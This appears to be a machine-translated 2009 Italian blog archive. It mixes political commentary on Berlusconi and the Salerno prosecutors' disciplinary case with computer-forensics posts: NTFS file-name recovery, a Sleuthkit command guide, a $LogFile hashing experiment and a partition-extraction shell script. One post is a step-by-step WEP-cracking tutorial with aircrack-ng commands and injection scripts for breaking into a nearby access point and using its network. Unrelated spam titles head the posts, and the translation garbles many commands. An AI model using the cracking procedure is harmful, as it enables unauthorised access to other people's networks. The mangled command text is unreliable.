Friday, December 18, 2009

Kasi Meaning In English

Arbeit Macht Frei



There are reports that speak for themselves, there are acts so despicable to try to shame those who fulfilled .

From the Corriere:
" An act of vandalism, but highly symbolic connotation. The sign bearing the inscription in German" Arbeit Macht Frei "(Work makes free") to place ' entrance of the former Nazi death camp of Auschwitz in Poland, was stolen by unknown persons. "


"Work makes you free".
The banality of a phrase that reminds us of the banality of evil.


Vincenzo



Tuesday, December 8, 2009

What Company’s Think About Osha

Legion Condor



Guernica, 1937 - Pablo Picasso




And from the seeds of death launched from small condor, sprang genius.

Vincenzo

Thursday, October 15, 2009

Go Kart Stores Louisiana

Filenames after formatting ... why? The mystery of

If you format a disk or a USB device, for example

NTFS, is formatted with the slow and fast, is recreated

MFT (Master File Table), right? files are not deleted, they disappear from view, just because there is no longer an index, a
MFT, which tells the file system where they are and what are their names, ergo we use There is no way to recover the file names, because there is more MFT that saves you, it has been overwritten by the new MFT and MFT all are allocated at the beginning of the disc. But how does

Recuva or R-Studio
to retrieve the file names, time and date?? I tried it on a memory stick formatted 2 times, a fast and a slow and even then formatted for Linux and anyway I can recover some files by name:

I tried R-Studio and he succeeds ... but I noticed that recovers some of the MFT metafile type
$ MFTMirr

,

$ MFTReconstructed
,

$ AttrDef ,


$ Bitmap, $ upcase

, $

MFT
,

$ Logfile, $ Boot who are not "0". So the explanation is that somehow these metafiles have not been overwritten with new ones when the new file system is formatted NTFS ... but it's weird! Then I tried to "dig " to better understand and here's what I got: strings-td-el-a / dev / sdb

(revenue strings contained in the device)
...

... Dl3.jpg
42281714 42282738 42282858 Dl4.jpg

15062008013.jpg
2.JPGjpg0

~ 42,283,762 190,820 42,283,882 42,284,786 190,820 19082008023.jpg ~ 3.JPGjpg0 19082008024.jpg
42284906 42285810 42285930 NANNI ~ 1.JPGa640
nanniricciola640. jpg 42286834 NANNIL ~ 1.JPGjpg0
42286954
nannileccia.jpg
...
etc.

I look with the hex editor the byte offset 42286954

corresponding to that referred to the string:
nannileccia.jpg






xxd-s 42286954-l 512 / dev / sdb
2853f6a : 6e00 6100 6e00 6e00 6900 6c00 6500 6300 nannilec 2853f7a: 6300 6900 6100 7000 6700 2e00 6a00 8000 .. cia .. jpg 2853f8a: 0000 4800 0000 0100 0000 0000 0400 0000 ............ .. H. 2853f9a: 9F01 0000 0000 0000 0000 0000 0000 4000 ..............@.

2853faa: 0000 0000 0000 0040 0300 0000 0000 8e3f .......@.......?
2853fba: 0300 0000 0000 0300 0000 0000 8e3f 22a0 .......?......". 2853fca: 0165 2800 0100 8279 4711 0000 ffff ffff .......... and (........ yG ... 2853fda: 0000 0000 0000 0000 0000 0000 0000 0000 .... ............
2853fea: 0000 0000 0000 0000 0000 0000 0000 0000 ................

2853ffa: 0b00 0000 0000 0000 0000 0000 0000 0000 ................
285400th: 0000 0000 0000 0000 0000 0000 0000 0000 ................
if I try to look for matches an i-node

(idiot proof I know! but since we
)



(42286954-0) / 512 = 82,591
(since the partition starts at sector 0 and the cluster size is 512 bytes)




ifind-f ntfs-o 0-s 82591 / dev / sdb Inode not found ; - )

Then there are the file names on the pendrive, but they are not allocated in a file (and rightly so I say), but programs like Recuva, Get Data Back or R-Studio can remap these file names thrown in the space of formatted disk with the files and then rebuild the file association - metadata. How do
... bho? With

Autopsy

clearly are not deleted files and search for data unit, inserting the value 82591, you get the raw view that cluster containing the string "nannileccia.jpg.





Well I hope it is interesting topic:) I look forward to your suggestions
Nanni Bassetti



Friday, March 20, 2009

Healing With Dentures

$ LogFile nell'MFT


Abstract: This article is based on a test conducted by me and I'd like to have verification from readers of this blog.


time ago I noticed an oddity, having dug a solution yet, I thought to submit it to the public on my blog, I emphasize that is based on a single test on which I have not an explanation, I could not have for my "ignorance", so I would like other opinions and / or trials.

said this step to describe the experiment:

Linux (without mounting neither read nor write)

1) attack on a 128MB pendrive formatted to NTFS
2) I dd the image and name pen1.dd

3) do the md5sum



from Windows XP:


4) attack the pendrive 128Mb

5) I cut it with Safely Remove


Linux

6) I image and dd name is pen2.dd
7) do md5sum

8) and compare the two md5 known to differ.

The pendrive is empty, the pendrive
NOT

was peeled, the pendrive is Windows only been attached to and detached with safe removal.


Now take the two images and the comparison with a program (for windows) called
HexCMP2



Find all the differences and fall into the cluster file $ LogFile

, which is the NTFS journal. For example, the last difference is the offset in decimal: 40203262


9) I mmls pen1.dd revenue offset the departure of the partition that is 32 10) fsstat-f ntfs-o 32 PEN1 . dd income and the size of the cluster that is 512
11) 40203262 divide by 512 = 78521 which is the offset in sectors

12) ifind-f ntfs-o 32-d 78521 pen2.dd
pulls me out: 2-128-1

ffind-f ntfs-o 32 pen2.dd 2-128-1 pulls me out / / $ LogFile
13) istat-f ntfs-o 32 pen1.dd 2-128-1

Finally I noticed that when you safely remove the display of the pendrive, the message WRITE (it is a USB module, MP3 player), then the procedure writes something ...


PROBLEM: If a CTU

clumsy attacks a Windows NTFS drive to a station, without Write Blocker, alters the original disc, but there is no trace of this alteration in terms of timeline ... . the hash code that will calculate what will be generated from the hard disk already altered, then copy and original will have the same hash code.
In a second step, a CTP resumes the original disc, attacks him with Write Blocker, is the image and the hash will coincide with that of the CTU, as the CTP did not affect anything ...
In a nutshell, the CTU has modified the original, but there is no trace of the date and time following the date of the seizure, then there is no way to prove that attacked the original HD to a system unprotected from
writing.
The problem is clearly more theoretical than practical, there are worse things around;)



Finally, the same tests done with the same MD5 FATX damage, perhaps because it is not FATX Journaled, and yes ... and NTFS $ LOGFILE is the journal of ntfs.


Any opinions, denial, confirmation is appreciated!



Nanni Bassetti




Friday, March 6, 2009

Free Jibjab Look Alike

The Sleuthkit - mini driving fast

often times when you forget all the potential and tools
Sleuthkit
, so I decided to write a quick little guide to illustrate typical uses of ready-to-wear for this very useful suite of tools for computer forensics, developed by Brian Carrier.

start from the disc / image

mmls / dev / sdaX or mmls disk.dd


used to display the partitions on a device or an image file, providing output in the starting sector, very useful for determining the offset of partition start.

'Mmls' as in 'fdisk-lu' in Linux with some differences. Namely, that shows the areas that have not been used so that these can be used to search for hidden data. It also provides the value of the length of the partitions so that it can be used with 'dd' to extract more easily.

: - ) fsstat file_system-f-o offset disk.dd

is to provide important data on the file system on the device or image file analysis of the device, including a particularly interesting, namely the block / cluster size.

ifind file_system-o-f-d offset numero_del_cluster disk.dd is to provide the i-node belongs to that particular cluster. The number of clusters is derived from offset in decimal bytes, we are seeing,

divided by the size of the cluster / block determined by fsstat. If we find, for example, a string starting at offset decimal 101,345 in a DD image file, to get the i-node will perform 101345/dim_cluster.


ffind file_system-o f-the-node offset disk.dd

is to provide the name of the file corresponding to the i-node.


istat-f-o file system i-node offset disk.dd

used to provide metadata about the file corrsipondente to that i-node.

fls-d-f-r-p-o offset file_system disk.dd

used to display deleted files recursively in all subfolders and with the full path (-p).

fls-a-l-p-r-f-o offset file_system disk.dd
list all the files are not deleted.

file_system icat-f-r-o offset disk.dd i-node> filename.ext

Used to export the contents of the file for the i-node to file (filename.ext).

sigfind-t file_system disk.dd

Need to look for "signatures" that identify the various file systems, t-list to display various file systems supported.

Other valuable information are:
http://wiki.sleuthkit.org/index.php?title=FS_Analysis


sleuthkit The Manual:

http://wiki.sleuthkit.org/index. php? title = TSK_Tool_Overview


Example of how to pull a string to an unallocated space


usually to search for strings by sending the pipe of commands:




strings-td disk.dd grep-i "abcd" ("-t d" generates the offset in decimal)
that is faster than the command:

grep-iaob "abcd" ; disk.dd


-i ignore upper / lower case;
-
is a binary file as if it were text; -b Print the byte offset
; -o
Show only the party line that coincides with the search string;



$ mmls disk.dd
DOS Partition Table Offset Sector: 0
Units are in 512-byte sectors
     Slot        Start                     End                   Length             Description 00:  Meta    0000000000   0000000000   0000000001   Primary Tabl 01:  -----     0000000000    0000000062   0000000063   Unallocated 02:  00:00   00000000
63 0174000014 0173999952 NTFS (0x07)
If we want to search for strings in unallocated space of disk.dd and considering that the starting sector of the partition is 63 and that the file system is NTFS, then:
1) We extract the unallocated space from disk
blkls-f ntfs-o 63 disk.dd> disk.blkls


2) We extract the strings and we take just those that "abcdefg", from the unallocated space only extracted from blkls (disk.blkls) strings-td disk.blkls

such a result would be: 10389739
: abcdefg

where 10389739 is the offset in bytes

3) We find the cluster size set in the file system:

fsstat-f ntfs-o 63 disk.dd
\u0026lt;...> CONTENT INFORMATION ----------------------------------


Sector Size : 512

Cluster Size: 1024
Total Cluster Range: 0 to 21749992
Sector Total Range: 0 to 173999950

4) Divide 10389739 by 1024 and get the number 10146 which is the cluster that contains the string "abcdefg" ;, but the file disk.blkls and not in the image file, so we must convert the address of the cluster disk.blkls image file into a real address of the original image file, ie disk.dd

5)
blkcalc-f ntfs-o 63-u 10146 disk.dd we get 59,382 which is the real address of the cluster that contains the search string.
6) We can see the cluster using the command: blkcat-f ntfs-o 63 disk.dd 59382
8) found metadata information relating to the i-node 493:

istat-f ntfs-o 63 493 disk.dd \u0026lt;...>
$ FILE_NAME Attribute Values:
Flags: Archive
Name: pippo.jpg
Parent MFT Entry: 458 Sequence: 122
Allocated Size: 0 Actual Size: 0
Created: Tue March 18 15:05:19 2008
File Modified: Tue March 18 15:05:19 2008

MFT Modified: Mon March 18 15:05:19 2008
Accessed: Tue March 18 15:05:19 2008




9) Let's see if there is still a file associated with the i-node:

ffind-f ntfs-o 63-to 493 disk.dd
/ Document and Settings / spectra / Documents / pippo.jpg we found a file called pippo.jpg.

10), taking the file pippo.jpg
icat-f ntfs-o 63-r 493 disk.dd> pippo.jpg
Consider that the starting sector of the partition is 63, which is disk.dd NTFS by icat command export the contents of relying on its number of i-node.
I hope that this small handy booklet will be useful to all those who, like me, begin to have the disk HAD biological increasingly full


Nanni Bassetti





Saturday, February 7, 2009

Staying In Kauai Hostels

Against the Constitution


So in one way or another we got there, our fears were unfounded and the Premier has done nothing but confirm his obscene attitude. According to some statements made on Courier and Republic Berlusconi Constitution defines the pro-Soviet, and his writing could only be described as ideological! Well as usual this circus dwarf even the founding fathers of the Town Council, who gave us a Constitution that still governs the foundation of our country, that same paper, which under the guise of a poor soul like Eluana outlet ducetto targeted by a two-bit which has as one goal the absolute power and then sees in the Constitution an impediment to his thirst for power, and therefore wants to rifarne a tear in his image and likeness so that the garbage will already be provided by combining a new, bright and Berlusconi paper constituent. I do not know whether there was criminal offenses (although what could be done as it is protected buttocks with the missile shield), I am not a lawyer or an expert but I think at least it can be accused of contempt of the Constitution and so on. Now has lost all forms of decency and shoot zero on everything and everyone should remember at this shabby man who many people died to get to the drafting of the Constitution and certainly will not be an entrepreneur convinced to be able to have everything and everyone to put an end to a document that makes Italy a democratic republic, citizens are smarter than ever and are very angry for all this rubbish in the media this homunculus is the principal author. Italian is now making a decision. Regards.

Wednesday, February 4, 2009

Pain In Left Pointer Finger To Thumb

Minister-Three dead in flight from Davos



Here are the first signs of the great mass emigration of politicians, soon we will also see the various dwarfs, Russian, Frattini, witches and bitches Gasparella accompanying cut and run not only by serious journalists, which wise to offer a public service and professional ethics are a milestone and not a cock, but also by citizens angry for any reason whatever .. Pick a random guess so .....

Here is a list of questions that a serious journalist should not do, keep on strictly necessary, for example, "What did you eat today," "How's sciura", "The lover as she goes", "At that time Arcore "does" ... well ... the usual lecchinerie assured that the pig will stand them in turn to bask in front of the cameras believes to be the king of the world! A bit like the witch Gasparella every 2 and 3 is always there to let me pass the appetite. Incazzatevi Italian!

- Geronzi
-
Alitalia - Public debt
- Finance
creative - Return of capital from abroad
- Unicredit, Banca Intesa San Paolo also
-
dormant accounts - Banking Transparency
- Conflicts of interest
- false accounting
- Tax Evasion
- Condon
- Parmalat bond

-Tango - Dragons
- Default
Italian State - Bankruptcy of the Italian communes
- INPS
- Growth of GDP in 2009, but in 2010
- 2009 auction of government securities

Saturday, January 24, 2009

Does Tissues Come Out With Implantation Bleeding

Samsung NC10 - Wep Cracking


I state that this item

for educational purposes only, that said we can start talking about how to prepare our


Samsung NC 10 Netbook

for wep cracking.

Step one (Linux onboard):


Install Linux

Ubuntu or Kubuntu on a free partition or by

Wubi, the latter system, lets you install Linux directly from Windows, thus avoiding all the problems of partitioning and once installed, reboot the computer, you have the two choices Windows and Linux.

: - D
Second step (install the MadWifi driver):
I boot Linux. We install wireless drivers for Linux:

madwifi and madwifi-tools (sudo apt-get install madwifi-tools), but you can disable the restricted driver that recognize card but do not allow it to function: System> Administration> Hardware Drivers and click Mute button bottom right, and then restart the system. After this, download the latest madwifi driver

from here and extract it to your Desktop, open a terminal and type: sudo apt-get install build-essential
, which is the package containing the software needed to compile the driver , and always from the terminal, it will compile the driver of
cd Desktop / madwifi-hal *
(if we have the drivers unzipped on the Desktop) sudo make sudo make install sudo modprobe ath_pci
To ensure that the drivers are loaded automatically at startup.
sudo gedit / etc / modules
or sudo kate / etc / modules
and bottom of the file, add: ath_pci


save and restart. the next reboot, the wireless card should be visible and configurable by clicking the Network Manager icon in the tray, or, I recommend using Wicd Networtk and Uninstall Manager.
(Personal note: After all these steps, I also restored the restricted driver and everything works)
Third Step (we arm the system):
Download the aircrack-ng suite
to Install Packages or terminal windows type:
sudo apt-get install aircrack-ng

After this we type in the terminal window the command: iwconfig


we should see something like (I have obscured my references with the X):


wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID: "XXXXXX" Nickname: "" Mode: Managed Frequency: 2,437 GHz Access Point: XX: XX: XX: XX: XX: XX Bit Rate: 24 Mb / s Tx-Power: 18 dBm Sensitivity = 1 / 1
Retry: off RTS thr: off Fragment thr: off Power Management: off Link Quality = 32/70
Signal level =- 61 dBm Noise level =- 93 dBm Rx invalid
NWID: 780 Rx invalid crypt: 0 Rx invalid frag: 0 Tx excessive
retries: 0 Invalid misc: 0 Missed beacon: 0
Now we have to put our wireless card (ath0
) in "
Monitor mode", then type: sudo

airmon-ng stop ath0 sudo airmon-ng start wifi0 then



iwconfig wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID: "" Nickname: ""
Mode: Monitor


Frequency: 2,437 GHz Access Point:

Bit Rate: 24 Mb / s Tx-Power: 18 dBm Sensitivity = 1 / 1 Retry: off RTS thr: off Fragment thr: off
Power Management: off Link Quality = 32/70
Signal level =- 61 dBm Noise level =- 93 dBm Rx invalid
NWID: 780 Rx invalid crypt: 0 Rx invalid frag: 0 Tx excessive
retries: 0 Invalid misc: 0 Missed beacon: 0



At this point we have to detect the available networks: write
:


sudo airodump-ng ath0 and we will have an output like this:

CH 11] [BAT: 34 mins] [Elapsed: 8 s] [24/01/2009 24:32 BSSID PWR
Beacons # Data, # / s CH MB ENC CIPHER AUTH ESSID

00: XX: 2E: XX: XX: A8 8 4 2 0 11 54. WEP WEP Pippo
00: E4: AA: 73:68: XX 28 27 0 0 6 54. WPA TKIP PSK BSSID STATION PWR
Rate Lost Packets Probes

from which we understand that there a wireless network protected by WEP, MAC Adddress on channel 11: 00: XX: 2E: XX: XX: A8 ESSID: Pippo

now we can start the attack, 4 Terminal windows open in the first write
: sudo airodump-ng-w Atho pacchetti_pippo - bssid 00: XX: 2E: XX: XX: A8-11 c


But let's step back, before running airodump-ng, we have to write a couple of bash scripts:


primo.sh
# / bin / bash /
# this script is used to authenticate to the AP (Access Point) to attack
# echo "Writing my mac:" read mio_mac

# echo "Writing 's set interface in monitor mode, "read the

# here Put the card in your Mac # discover it with iwconfig
mio_mac = "00:00:00:00:00:00"
echo "write the MAC ADDRESS API to attack"
read mac_ap
echo "write 's essid WLAN to attack, "read
SSID_wlan aireplay-ng -1 0-e-a $ $ SSID_wlan mac_ap-h $ i $ mio_mac


Here the data will be the MAC and the name of Pippo Pippo (essid).


Launch primo.sh with: sudo sh


primo.sh


Then write secondo.sh:
# / bin / bash /
# here put the card in your Mac #
discover it with iwconfig
mio_mac = "00:00:00:00:00:00"
echo "Writing the interface set in monitor mode," read the
echo "Writing the AP ESSID:"
read and
echo "enter the MAC ADDRESS BEES"
read mac_ap
aireplay-ng -3-and $ and $ mac_ap-b-h $ i $ mio_mac



launch secondo.sh with: sudo sh



secondo.sh


This script is used to inject (packet injection), the packets on the AP and in order to generate traffic and can capture many packets, to feed the last weapon:
aircrack-ng terminal window


last write:


sudo aircrack-ng-z-b mac_di_pippo pacchetti_pippo *. cap
but just enough:
sudo aircrack-ng-z *. cap pacchetti_pippo


let him work .... after a tot. time, from 3 to 10 minutes, depending on signal strength, you will get a key found in hexadecimal:


KEY FOUND! [XX: D1: F2: 67:4 D: 18:6 B: XX: XX: XX: 1X: XX: XX]
Decrypted Correctly: 100%


At this point we have the password in hex, we can already use it , added to our network operator, in both Windows and Linux, and not the WEP Hex Key WEP Key Passphrase.
However, if you ever want to see if the event is a key human-readable we can try to write this: echo


key_trovata xxd-r-p


now remains the last problem, how to find your subnet and gateway of the AP Goofy?

launch

Wireshark, which you previously downloaded and installed, then open the packages pippo_pacchetti.cap (from File-> Open)
go to Edit -> Preferences-> Protocols mixture
the IEEE 802.11 and entered in field key1 we could find the key, then one and finally a
Apply


OK. At this point we will see paccchetti clear, even with the cut and thrust of the gateway with our computers, from here you can go back to the AP that belongs to subnet attached and what is the gateway.
For DNS, just use the OpenDNS
and you're done!
Clearly, wireshark, it may not be used if the AP has DHCP enabled, then automatically assigns IP address, Gateway and DNS.

finally type: sudo rmmod ath_pci



sudo modprobe ath_pci and



in order to restore our wireless card to surf.

course, you can expand the discussion of aireplay attacks, forging of the MAC of your card, use of Kismet ... but this is up to you;)




Nanni Bassetti



Thursday, January 22, 2009

Russian Tortoise Columbus Oh

The full text of the letter of the prosecutors of the TNT Salerno



















From: http://toghe.blogspot.com/2009/01/il-testo-integrale-della-lettera-dei.html

Here is the letter by which the magistrates of Salerno express their dismay at all the garbage executive adopted by the CSM on cue Minister Alfano ..... Poor Italy.!


the junta Sectional ANM
Salerno

The Steering Central ANM
Rome



The news of the decisions of the Disciplinary Committee of the CSM On January 19, 2009, against the Public Prosecutor of Salerno, Luigi Apicella, and Deputy Attorney Denis Verasani and Gabriella Nuzzi, aroused bewilderment and concern among judges employed by the Public Prosecutor of Salerno.

The severity and urgency of the sanctions taken protective measures against these gentlemen has shocked not only the organization of the Public Prosecutor of Salerno, but also our conscience, considering that we could appreciate the unquestionable professionalism, commitment, honesty and fairness them during the long periods of joint work.

Contrary to what the president ANM aftermath of those decisions, we can not really support with equal conviction that in this case "the system" has demonstrated to have adequate "antibodies" , because the same measures of search and seizure evaluated negatively in disciplinary received, however, a different opinion in an appeal by the competent Court which confirmed its legitimacy.

those circumstances we wonder and ask, not only in the quality of the magistrates of the Public Prosecutor of Salerno, but also of Italian citizens, what are the current limits of the autonomy and independence of the judiciary, are assessed if a judicial so differently in locations deputies and disciplinary proceedings to the extent to anticipate being so protective sanctions serious, especially the suspension from duties of Magistrate Dr. Apicella, who certainly did not many precedents in the history of similar disciplinary section of the CSM.

We can not but express our concern, therefore, not only for the future of this prosecutor, but the entire judiciary and, therefore, demand that we ask is that as soon convened a meeting to confront urgent and extraordinary and clarify all together on current and future content of the autonomy and independence of the Italian judiciary.

Salerno, January 20, 2009

public prosecutors of Republic of Salerno

Henry D'Auria
Erminio Rinaldi
Umberto Zampoli
Antonio Centore
Luigi D'Alessio
Rosa Maurizio Volpe
Cardea
Vallevardina Cassaniello
Mariella De Masellis
Angelo Frattini
Sunday
Patricia Gambardella Gambardella
Vincenzo Montemurro
Rocco Alfano
Roberto Penna
Maria Carmela Polito
Vincenzo Senatore
Carmen Oliveri
Maria Chiara Minerva
Cristina Giusti
Ernesto Sassano
Elena Cosentino
Marinella Guglielmotti
Anthony Cantarella
Regina Elephant

Advertising Ideas For Starting A New Business

Yesterday, today the official documents (and makeup)


carried an article by Carlo Vulpio directly from his blog. I do not need to comment further. My respect and my moral support to Dr. Nuzzi go without hesitation to Dr. Apicella and Dr. Verasani, never give up, even in the darkest moments there is always a ray of light that illuminates the road. This scheme beam is not worthy of the darkest it will be our grave, the tomb of freedom, justice and legality, but they will, they will succumb under the weight of their lies of their abuses of their misdeeds. Keep blow, let go .. NEVER!

text of the article by Charles Vulpio:

's all clear, but so clear, that does not even explain. The CSM sends off Salerno prosecutors Luigi Apicella, Gabriella Nuzzi and Verasani Dionysius as "guilty" of having complied with the law, as confirmed by three judges of a court of review the Italian Republic.

It 's like to affirm the principle that those who have not killed or stolen must go to jail, even in the presence of the court order stating that that person has not stolen and not killed.

's all clear, but so clear, that does not even explain. The three judges of Salerno have been sent away from the CSM - Apicella and the prosecutor was even suspended from the salary, as it has never been decided even before obvious cases of corruption - because they have done their duty.

A minister, the justice, Angelino Alfano , Has arrogated to itself a power that has not, judging "abnormal" and "lacks balance" the provision of search and seizure orders issued by judges against judges under investigation Salerno of Catanzaro, and the CSM said: "I obey." A is worth nothing that the court of review has considered this provision of law-abiding judges Salerno. The CSM has performed el'Anm approved. As the head of state Giorgio Napolitano , who is also chairman of the CSM does not say a word. But it goes in Calabria, where a few days ago, does not fail to urge the people who had believed for a moment that we were all equal before the law, to "respond against organized crime ", with its corollary of unbearable blablabla.

's all clear, but so clear, that does not even explain. This other black page proves, if proof were needed, not only that there are instigators and perpetrators, but also who is one and who are the others.

There is no clash between politics and the judiciary. Instead, they are allies in the work of elimination - with dynamite yesterday and today with the official documents, and rigged - judges who do their duty, and especially of those judges who do their duty towards other judges, thus breaking a conspiratorial corporatism now beyond the threshold of tolerability.

The test, if this were needed, is in two simple facts. The remarks of the President ANM, Luca Palamara - that was when the prosecutor in Reggio Calabria has been the focus of fierce controversy on certain procedures covered up - and the "purge" of the news from newspapers and TV work in unison.

Palamara said that "the system has failed to respond, showing that you have the antibodies necessary" (right: the system, that to which he belongs), while no news report has dared to remember that the decision of the judges of Salerno for requesting transfer of the same was found to comply with law by the Court of Review.

's all clear, but so clear, you do not need to waste words but action. What happened blew up, once again, even more, the basic tenets of any compact between the governed and governors.

This decision of the CSM pm on Salerno is proof that you can do everything. Even in our fall and your homes, for example, and arrest, arrested, in the name of the law and in the name of the Italian people. Then, democratically and peacefully, we must act. All bloggers, all web sites, known and unknown, all the associations and all people of good will, known and less known, who are outside but also within parties should organize themselves and make their voices heard.

If Italy is not capable of this minimal gesture of rebellion democratic, then it means that Italy is a country already dead and does not know.


http://www.carlovulpio.it/Lists/PRIMO% 20PIANO/DispForm.aspx? ID = 14 & Source = http% 3A% 2F% 2Fwww.carlovulpio.it% 2fdefault.aspx

Ideas For Decorating Cheesecake

Farewell all'Anm of Pm Salerno Gabriella Nuzzi, transferred from the CSM


















reported from the site: http://voglioscendere.ilcannocchiale.it/

Let us turn this SAD AND DRAMATIC TESTIMONY, EVIDENCE AND EVIDENCE OF THE DEATH OF THE DEMOCRATIC REPUBLIC now defunct.

This is the letter that Gabriella Nuzzi - prosecutor in Salerno, transferred from his office at the request of the minister by the CSM Alfano for daring to investigate the legal brothels of Catanzaro that had already been expelled as a foreign body Luigi De Magistris - sent to the President of the National Association of Magistrates, Luca Palamara, announcing his resignation by the union of the gowns, which has sided with the minister and the CSM. It 'a document that speaks for itself, its painful honesty and for his dramatic representation of night that envelops our democracy .
mt

the National Association of Magistrates - Rome

"Mr. President,
I communicate with my, the irrevocable decision to leave the National Association of Magistrates.
acclaim you have made publicly by the injustice suffered at the hands politics We Magistrates of the Public Prosecutor of Salerno is intolerably offensive to me.
offensive to my dignity as a person and to be Magistrate.
I was, in general cowardly silence, publicly insulted, blamed ignorance, negligence, recklessness, lack of sense of institution, and finally moved away from my home and functions of private investigators, so, in the blink of an eye, based on nothing legal and summary trials.

For his mouth and his friends and colleagues, the position of the Association was already known from the beginning.

What to blame? Have, contrary to the profuse appearance, duly adopted and executed judicial, legal and necessary, those deemed competent judicial fora.
Having responded to instances of truth and justice. Having found a disturbing reality, however, had to remain concealed.

Neither she nor any of the members of the association that represents worthily today has felt the need to understand and explain what really happened, the seriousness and drama of a story that calls for deep reflection the entire Judiciary, on its past, what is its future, and certainly not in the interests of individual staff or its sponsors associations, but by virtue of a higher ideal reason, which is - or should be - constantly and perpetually alive in the conscience of every magistrate: the search for truth.

easier to pretend to believe a lie: the conflict, the war between prosecutors, the isolation of madness "loose cannon". The scandal raises
disorder: is sedated immediately and severely punished.
The people will know that this is right.
It will be worth the sacrifice of a few reasons of state.

The Association does not intend to treat. Closed.

In these days of pain, Mr President, my thoughts turn to the solemn words that you (as reported by the press) would have been publicly uttered a few Moments later the original "conviction" means "The system has demonstrated that antibodies.

Thus, the system, once again, has proven to work.

I wonder, then, restless as a "system" you refer to.
What the "system" that feels so proud representative and guarantor.

A "system" that is not capable of ensuring the observance of minimum rules of civilized life, the application and enforcement of sentences?
A "system" in which the statement is given in vain judicial review of the fundamental rights of human beings; instances where the weak are oppressed and trampled the pain of those victims still crying for blood?
A "system" in which the commitment and sacrifice of silent individual is crushed under the weight of an infernal machine, the gears become antiquated and hopelessly jammed?
A "system" subservient to the interests of power, which is cheaper to lock up the truth in dusty drawers and continue to dot the brilliant career success?

Tell me, Mr. President, what would be the antibodies that it is able to generate? Exemplary punishment to those who are loyal and brave and impunity for those who blatantly breaks the law? And what

viruses?

And explain to me again, what would be "the model suitable for a constitutional role of judges and the importance of the interests involved the exercise of jurisdiction" that the Association intends to promote?

Now, the "system" that I see is not in a position to be able to work.
the contrary, it is sick, dying, suffering from incurable cancer, which will lead inexorably to death.
And I do not want to be part of it, because I am alive and I want to build something good for our children.
I swore allegiance to the only court order and the rule of the Italian Republic. The sudden violence

which, in response to a political rating, it was summarily decided the deprivation of the investigative functions and removal of investigations under way against magistrates who have only fulfilled his duties, makes, frankly, very disturbing your tired and empty proclamations, now spoken only to yourself, as in a mirror split.

While you're distracted by the sight of some captivating mirage, a whistle and I tell you that the principles at stake here is the autonomy and independence of the Jurisdiction. Not the private garden plots.

not worth the trouble never step on and let it trample the dignity of human beings.

For me, I know that I'll meet with the same strength, honesty and professionalism functions other than that I have been unjustly torn, with absolute respect, as always, constitutional principles, primary among them is that the law should be the same for weak and powerful .
I know I have strong and well next to the consciences of those who still, despite everything, believes in and fights every day for the affirmation of legality.
And that is that it will always continue to love and honor this profound work.

Mr. President, continues to represent himself and this Association.
I prefer to represent me alone. "

Dr. Gabriella Nuzzo
Magistrate

Saturday, January 10, 2009

How To Defrost Kitchenaid Freezer

MultiFS Detector and Extractor

From year proposed by Mario Pascucci (
HERE), I got the inspiration to write this scriptino, which does nothing but seek, through sigfind, the 55AA signature FATX and NTFS partitions, and then from the offset, obtained by multiplying the number of sectors, found by sigfind, for 512 bytes, find the value of the bytes of FATX 32,33,34,35 or 40 to 48 for NTFS, and converts them to find Big Endian and then calculating the total length of the partition in sectors.
Then, create dd image containing all the possible hidden partitions. Surely it is



crude, but fast enough, su 2Gb di pen-drive con tre strati, ci ha messo poco più di 20 minuti.

Attualmente funziona su Fat12,Fat16,Fat32,NTFS,Ext2/3


#!/bin/bash

# MultiFS detector and extractor by Nanni Bassetti - Blog:

http://www.nannibassetti.com/dblog
WEB Site:

http://www.nannibassetti.com


# It can detect and extract hidden file systems and partitions from the mass memory support.

# It runs in this way e.g.: sh multifs.sh fat disk.dd or multifs.sh fat /dev/sda # It works only on ntfs,fat12,fat16,fat32, ext2,ext3. # Important things:
# FATx: sector size; bytes 11-12
# ext2/3: Block size (saved as the number of places to shift 1,024 to the left); bytes 24-27
# NTFS: sector size bytes; from 11 to 12

# ReiserFs: sector size bytes; 12-13 file=$2 # file or dev

fs=$1 # file system date # looking for the signatures
sigfind -t $fs $file > sigs.txt

# FAT case
if [ "$fs" = "fat" ]

then # taking only the sectors for i in $(cat sigs.txt awk -F "Block:" '{print $2}'awk '{print $1}')

do
offset=$(( $i*512 ))

j=$(( j+1 ))

# controlling the word "FAT" inside the target partition
fat_flag=$(xxd -s $offset -l 512 $file grep -i FAT)

if [ "$fat_flag" ]

then
# looking for the sector size

start_bs=$(echo $offset + 11 bc)
xxd -s $start_bs -l 2 $file awk -F ":" '{print $2}' xxd -p -r >bs.bin #converting in big endian dd if=bs.bin of=b1 skip=1 count=1 bs=1c dd if=bs.bin of=b2 skip=0 count=1 bs=1c cat b1 b2 > bs.dat
rm b1
rm b2
rm bs.bin
#calculating the sector size length
lenbs=$(cat bs.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
bs=$(echo "obase=10; ibase=16; $lenbs" bc)

# check if byte 32-35 are 0 then the fat type is fat12
start_byte_fat_len=$(echo $offset + 32 bc)

check_fat12=$(xxd -s $start_byte_fat_len -l 4 $file awk -F ":" '{print $2}' xxd -p -r)
if [ ! "$check_fat12" ]
then
echo "File System chosen: FAT12"
start_byte_fat_len=$(echo $offset + 19 bc)
# extracting bytes 19-20 from FAT
xxd -s $start_byte_fat_len -l 2 $file awk -F ":" '{print $2}' xxd -p -r >lung.bin
#converting in big endian
dd if=lung.bin of=l1 skip=1 count=1 bs=1c
dd if=lung.bin of=l2 skip=0 count=1 bs=1c
cat l1 l2 > l.dat
rm l1
rm l2
rm lung.bin
#calculating the partition length
len=$(cat l.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
len2=$(echo "obase=10; ibase=16; $len" bc)
dd if=$file of=hidden$j.dd skip=$i count=$len2 bs=$bs
rm l.dat
ls -l *.dd
else
echo "File System chosen: $fs"
echo "Sector size: "$bs
start_byte_fat_len=$(echo $offset + 32 bc)
# extracting bytes 32-35 from FAT
xxd -s $start_byte_fat_len -l 4 $file awk -F ":" '{print $2}' xxd -p -r >lung.bin
#converting in big endian
dd if=lung.bin of=l1 skip=3 count=1 bs=1c
dd if=lung.bin of=l2 skip=2 count=1 bs=1c
dd if=lung.bin of=l3 skip=1 count=1 bs=1c
dd if=lung.bin of=l4 skip=0 count=1 bs=1c
cat l1 l2 l3 l4 > l.dat
rm l1
rm l2
rm l3
rm l4
rm lung.bin
#calculating the partition length
len=$(cat l.datxxd -p tr [:lower:] [:upper:])
